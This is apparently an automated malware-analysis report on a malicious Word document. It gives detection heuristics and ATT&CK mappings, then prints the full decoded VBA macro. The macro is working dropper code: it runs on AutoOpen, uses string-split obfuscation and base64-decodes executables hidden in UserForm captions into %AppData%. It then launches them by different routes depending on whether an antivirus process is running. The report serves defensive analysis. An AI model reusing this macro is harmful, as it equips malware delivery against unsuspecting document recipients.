MALICIOUS
358
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. Critical heuristics indicate the presence of a potential Shell call, a CreateObject call, and an embedded PE file that is decoded from a VBA payload string. This suggests the macro's primary function is to drop and execute a secondary payload. The ClamAV detection further confirms its malicious nature.
Heuristics 11
-
ClamAV: Ole2.Macro.Agent-9858864-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Ole2.Macro.Agent-9858864-1
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell GetQuoteStart() & GetCommand(cvacjgzddhi) & GetQuoteEnd(), GetWindowStyle() -
Embedded PE decoded from VBA/UserForm payload string critical OLE_VBA_EMBEDDED_PE_DROPPERThe VBA macro carries a Windows executable encoded as a base64 or hex string — split across macro string literals, or stored in a UserForm control's text (e.g. TextBox1.Text) — and rebuilds it at run time, typically writing it to %ProgramData%/%TEMP% (ADODB.Stream / binary Put) and executing it via WScript.Shell or cmd.exe. The payload is embedded in the document, not downloaded, and never appears as a contiguous executable on disk, so the URL recoverers and the raw embedded-EXE scan miss it. The analyzer decoded it into a valid PE (MZ + DOS stub + PE header); a benign document does not carry an executable in its macro/form strings. The dropped payload has been carved for full extracted-file analysis.
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set wsh = CreateObject("W" + _ -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
result(0) = CallByName(UserForm1.Controls("C" + _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
GetAppDataPath = Environ("A" + _ -
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes foundDisassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x41 bytesDisassembly hidden — these bytes score as data, not coherent x86 code (5/10 branch targets land on an instruction boundary (50% coherence)).
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ocsp.digicert.com0A In document text (OLE body)
- http://ocsp.digicert.com0\In document text (OLE body)
- http://s.symcd.com06In document text (OLE body)
- http://ts-ocsp.ws.symantec.com0In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.microsoft.com/SMI/2016/WindowsSettingsIn document text (OLE body)
- http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0CIn document text (OLE body)
- http://crl3.digicert.com/DigiCertTrustedRootG4.crl0In document text (OLE body)
- http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S�Q�O�Mhttp://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0In document text (OLE body)
- http://www.digicert.com/CPS0��In document text (OLE body)
- http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0In document text (OLE body)
- https://calibre-ebook.comIn document text (OLE body)
- https://d.symcb.com/cps0%In document text (OLE body)
- https://d.symcb.com/rpa0In document text (OLE body)
- http://s.symcb.com/universal-root.crl0In document text (OLE body)
- https://d.symcb.com/rpa0@In document text (OLE body)
- http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0In document text (OLE body)
- http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(In document text (OLE body)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9760 bytes |
SHA-256: 9f6362e074d741918f30426c2cf4c282d9a27c607421b387b1817809cc4457ea |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As LongPtr, ByVal dwMilliseconds As Long) As Long
Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare PtrSafe Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, ByRef lppe As PROCESSENTRY32) As Long
Private Declare PtrSafe Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, ByRef lppe As PROCESSENTRY32) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Const TH32CS_SNAPPROCESS As Long = &H2
Private Const MAX_PATH As Long = 260
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Private Function CreateSnapShot() As Long
CreateSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)
End Function
Private Function GetExeFileName(procEntry As PROCESSENTRY32) As String
Dim nullPos As Long
nullPos = InStr(procEntry.szExeFile, Chr$(0))
If nullPos > 0 Then
GetExeFileName = Left$(procEntry.szExeFile, nullPos - 1)
Else
GetExeFileName = procEntry.szExeFile
End If
End Function
Function IPR(processName As String) As Boolean
Dim hSnapshot As Long
Dim procEntry As PROCESSENTRY32
Dim ret As Long
Dim currentName As String
IPR = False
hSnapshot = CreateSnapShot()
If hSnapshot = 0 Then Exit Function
procEntry.dwSize = Len(procEntry)
ret = Process32First(hSnapshot, procEntry)
Do While ret <> 0
currentName = GetExeFileName(procEntry)
If LCase(currentName) = LCase(processName) Then
IPR = True
Exit Do
End If
ret = Process32Next(hSnapshot, procEntry)
Loop
CloseHandle hSnapshot
End Function
Sub xvqkblk(programPath As String)
Dim wsh As Object
Set wsh = CreateObject("W" + _
"S" + _
"c" + _
"ri" + _
"p" + _
"t." + _
"S" + _
"h" + _
"el" + _
"l")
wsh.Run """" & programPath & """", 1, False
End Sub
Function fileExist(filePath)
Dim fso
Set fso = CreateObject("Sc" + _
"ri" + _
"pti" + _
"n" + _
"g.Fi" + _
"le" + _
"Sys" + _
"te" + _
"m" + _
"Obje" + _
"ct")
If fso.fileExists(filePath) Then
fileExist = True
Else
fileExist = False
End If
Set fso = Nothing
End Function
Sub ixkwkpzwa(cvacjgzddhi As String)
ExecuteShellCommand cvacjgzddhi
End Sub
Sub ExecuteShellCommand(cvacjgzddhi As String)
Shell GetQuoteStart() & GetCommand(cvacjgzddhi) & GetQuoteEnd(), GetWindowStyle()
End Sub
Function GetQuoteStart() As String
GetQuoteStart = Chr(34)
End Function
Function GetCommand(cvacjgzddhi As String) As String
GetCommand = cvacjgzddhi
End Function
Function GetQuoteEnd() As String
GetQuoteEnd = Chr(34)
End Function
Function GetWindowStyle() As Integer
GetWindowStyle = CalculateStyleValue()
End Function
Function CalculateStyleValue() As Integer
CalculateStyleValue = SubtractValues(10, 5)
End Function
Function SubtractValues(a As Integer, b As Integer) As Integer
SubtractValues = a - b
End Function
Private Function CleanInputString(s As String) As String
On Error Resume Next
CleanInputString = Replace(Replace(Replace(Replace(s, " ", ""), vbCr, ""), vbLf, ""), vbCrLf, "")
End Function
Private Function DB64I(cleanedStr As String) As Byte()
On Error Resume Next
Dim objNode As Object
Set objNode = CreateObject("M" + _
"SX" + _
"M" + _
"L2" + _
".DO" + _
"M" + _
"Do" + _
"cu" + _
"me" + _
"nt").createElement("b6" + _
"4")
With objNode
.DataType = "bi" + _
"n.b" + _
"as" + _
"e6" + _
"4"
.Text = cleanedStr
DB64I = .nodeTypedValue
End With
If Err.Number <> 0 Then DB64I = Split("")
End Function
Function bAd64(s As String) As Byte()
Dim cleanedStr As String
cleanedStr = CleanInputString(s)
bAd64 = DB64I(cleanedStr)
End Function
Private Function PrepareBuffer(buf As Variant) As Byte()
Dim i As Long
Dim tmp() As Byte
If VarType(buf) <> vbArray + vbByte Then
PrepareBuffer = Split("")
Exit Function
End If
ReDim tmp(LBound(buf) To UBound(buf))
For i = LBound(buf) To UBound(buf)
tmp(i) = buf(i)
Next i
PrepareBuffer = tmp
End Function
Private Function WBTD(FileName As String, staticBuf() As Byte) As Boolean
Dim fileNum As Integer
Dim i As Long
On Error GoTo ErrHandler
fileNum = FreeFile
Open FileName For Binary As #fileNum
For i = LBound(staticBuf) To UBound(staticBuf)
Put #fileNum, , staticBuf(i)
Next i
Close #fileNum
WBTD = True
Exit Function
ErrHandler:
WBTD = False
End Function
Function WrtBnfile(FileName As String, buf As Variant) As Boolean
Dim staticBuf() As Byte
staticBuf = PrepareBuffer(buf)
On Error Resume Next
If UBound(staticBuf) < LBound(staticBuf) Then
WrtBnfile = False
Exit Function
End If
On Error GoTo 0
WrtBnfile = WBTD(FileName, staticBuf)
End Function
Function vzexuqlaqfmxnd(path As String, conte As String)
hwminiArraXx = bAd64(conte)
WrtBnfile path, hwminiArraXx
End Function
Function GetAppDataPath() As String
GetAppDataPath = Environ("A" + _
"pp" + _
"D" + _
"at" + _
"a")
End Function
Function BuildDestPath1(appDataPath As String) As String
BuildDestPath1 = appDataPath & "\e" + _
"bo" + _
"ok-" + _
"e" + _
"d" + _
"it" + _
".e" + _
"xe"
End Function
Function BuildDestPath2(appDataPath As String) As String
BuildDestPath2 = appDataPath & "\C" + _
"Al" + _
"ibr" + _
"e" + _
"-LA" + _
"un" + _
"c" + _
"h" + _
"er.d" + _
"ll"
End Function
Function BuildDestPath3(appDataPath As String) As String
BuildDestPath3 = appDataPath & "\e" + _
"di" + _
"t2." + _
"h" + _
"lp"
End Function
Function GetFormContent() As String()
Dim result(2) As String
result(0) = CallByName(UserForm1.Controls("C" + _
"om" + _
"ma" + _
"n" + _
"d" + _
"But" + _
"t" + _
"on1"), "Ca" + _
"pt" + _
"i" + _
"on", VbGet)
result(1) = CallByName(UserForm2.Controls("Co" + _
"mma" + _
"nd" + _
"Bu" + _
"t" + _
"to" + _
"n" + _
"1"), "C" + _
"ap" + _
"t" + _
"io" + _
"n", VbGet)
result(2) = CallByName(UserForm3.Controls("Com" + _
"ma" + _
"ndBu" + _
"tt" + _
"on1"), "Ca" + _
"pti" + _
"on", VbGet)
GetFormContent = result
End Function
Sub CopyRequiredFiles(destPath1 As String, destPath2 As String, destPath3 As String, content() As String)
vzexuqlaqfmxnd destPath1, content(0)
vzexuqlaqfmxnd destPath2, content(1)
vzexuqlaqfmxnd destPath3, content(2)
End Sub
Sub CheckProcessAndRun(filePath As String)
If IPR("a" + _
"v" + _
"p" + _
"." + _
"e" + _
"x" + _
"e") Then
xvqkblk (filePath)
Else
ixkwkpzwa (filePath)
End If
End Sub
Function start()
Dim appDataPath As String
Dim destPath1 As String, destPath2 As String, destPath3 As String
appDataPath = GetAppDataPath()
destPath1 = BuildDestPath1(appDataPath)
destPath2 = BuildDestPath2(appDataPath)
destPath3 = BuildDestPath3(appDataPath)
If Not fileExist(destPath1) Then
Dim content() As String
content = GetFormContent()
CopyRequiredFiles destPath1, destPath2, destPath3, content
End If
CheckProcessAndRun destPath1
End Function
Sub AutoOpen()
start
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{11C092C5-485D-4090-B1AE-F818504DD278}{7E6329FE-5251-4EA9-8DB5-91AC7F6DC093}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{E93AEF7F-409B-473E-898F-3B87FE741F26}{6816DD3D-A376-45A8-9A88-02F2A8DC9F68}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{56E45436-44B1-4E40-BC1E-C77B8BE8F702}{BA6C2CC5-358C-4630-9272-FC85AAA4281D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vba_embedded_payload.bin |
vba-embedded-pe | decoded from a hex/base64 payload string in a VBA UserForm control or macro literal | 96368 bytes |
SHA-256: 2459fafef92fba15db51222e6b94e9853b7eff3256a54be22736e41b587a1b1f |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.